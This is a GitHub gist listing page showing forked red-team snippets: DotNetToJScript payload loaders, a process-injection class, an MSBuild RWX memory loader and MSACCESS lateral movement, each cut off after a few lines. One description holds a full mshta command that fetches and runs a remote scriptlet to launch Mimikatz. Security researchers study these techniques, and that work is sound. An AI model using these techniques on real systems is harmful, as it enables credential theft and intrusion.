manilz manilz
manilz
/ JScriptToDotnet.js
Created
March 16, 2023 23:54
— forked from leoloobeek/JScriptToDotnet.js
Sample Extract Payload DotNetToJScript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Base64 Raw Decoder | |
| function Base64Decode(str) { | |
| if (!(/^[a-z0-9+/]+={0,2}$/i.test(str)) || str.length%4 != 0) throw Error('Not base64 string'); | |
| var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; | |
| var o1, o2, o3, h1, h2, h3, h4, bits, d=[]; | |
| for (var c=0; c<str.length; c+=4) { // unpack four hexets into three octets |
manilz
/ Inject.cs
Created
March 16, 2023 20:09
— forked from infosecn1nja/Inject.cs
DotNetToJScript Build Walkthrough
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
manilz
/ mimikatz.sct
Created
March 16, 2023 06:24
— forked from vector-sec/mimikatz.sct
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
manilz
/ Lookup CLSID in PowerShell
Created
February 24, 2023 01:59
— forked from brad-anton/Lookup CLSID in PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Lookup-Clsid | |
| { | |
| Param([string]$clsid) | |
| $CLSID_KEY = 'HKLM:\SOFTWARE\Classes\CLSID' | |
| If ( Test-Path $CLSID_KEY\$clsid) { | |
| $name = (Get-ItemProperty -Path $CLSID_KEY\$clsid).'(default)' | |
| $dll = (Get-ItemProperty -Path $CLSID_KEY\$clsid\InProcServer32).'(default)' | |
| } | |
| $name, $dll |
manilz
/ gist:dd71adcdae2f7f379d625c1fe204e8e1
Created
February 15, 2023 04:55
— forked from TheWover/gist:631ea8b25c6ae4090522eb4d17dc20fc
MSBuild Property Functions - Load RWX Memory Mapped File
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
| <Target Name="Hello" > | |
| <!-- Call ANY .NET API --> | |
| <!-- | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
manilz
/ LoadXSLFromMem.cs
Created
February 15, 2023 04:53
— forked from TheWover/LoadXSLFromMem.cs
Loads XSL files from memory (or disk) using the Microsoft.XMLDOM COM object.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace TryCOMXSLLoad | |
| { | |
| class Program |
manilz
/ Invoke-AccessXSLT.ps1
Created
February 15, 2023 04:53
— forked from TheWover/Invoke-AccessXSLT.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Lateral Movement Via MSACCESS TransformXML | |
| Author: Philip Tsukerman (@PhilipTsukerman) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| #> | |
| function Invoke-AccessXSLT { | |
| <# |
manilz
/ dllmain.go
Last active
January 23, 2023 17:18
— forked from NaniteFactory/dllmain.go
An implementation example of DllMain() entrypoint with Golang. $ go build --buildmode=c-shared -o my.dll && rundll32.exe my.dll Test
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| //#include "dllmain.h" | |
| import "C" |